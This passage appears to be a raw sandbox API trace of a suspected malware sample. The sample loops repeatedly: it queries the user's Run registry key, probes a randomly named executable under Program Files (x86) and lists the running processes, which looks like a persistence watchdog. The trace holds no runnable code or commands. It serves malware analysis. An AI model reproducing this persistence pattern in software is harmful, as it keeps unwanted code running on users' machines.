[0171.926] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.997] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.998] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.998] NtClose (Handle=0x270) returned 0x0 [0171.999] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.999] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.999] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700268) returned 1 [0171.999] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.999] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.999] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700808) returned 1 [0171.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0172.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0172.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0172.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0172.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0172.005] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0172.097] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0172.098] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0172.098] NtClose (Handle=0x270) returned 0x0 [0172.098] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.098] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0172.099] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700358) returned 1 [0172.099] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.099] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0172.099] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700a60) returned 1 [0172.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0172.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0172.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0172.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0172.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0172.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0172.108] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0172.174] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0172.181] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0172.181] NtClose (Handle=0x270) returned 0x0 [0172.181] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.181] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0172.181] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700268) returned 1 [0172.181] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.181] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0172.182] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6fff98) returned 1 [0172.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0172.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0172.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0172.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0172.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0172.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0172.191] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0172.200] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0172.202] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0172.202] NtClose (Handle=0x270) returned 0x0 [0172.202] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.202] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0172.202] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700088) returned 1 [0172.202] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.202] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0172.203] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7006a0) returned 1 [0172.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0172.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0172.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0172.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0172.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0172.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0172.211] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0172.225] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0172.227] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0172.227] NtClose (Handle=0x270) returned 0x0 [0172.227] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.227] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0172.771] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700628) returned 1 [0172.771] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.771] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0172.771] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700268) returned 1 [0172.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0172.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0172.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0172.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0172.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0172.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0172.779] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0172.871] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0172.872] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0172.872] NtClose (Handle=0x270) returned 0x0 [0172.872] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.872] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x270, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0172.872] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7008f8) returned 1 [0172.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0172.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0172.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0172.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0172.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0172.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0172.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0172.911] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0172.912] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0172.912] NtClose (Handle=0x274) returned 0x0 [0172.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0172.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0172.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0172.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0172.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0172.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0172.919] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0172.925] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0172.926] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0172.926] NtClose (Handle=0x274) returned 0x0 [0172.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0172.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0172.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0172.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0172.930] NtQuerySystemInformation 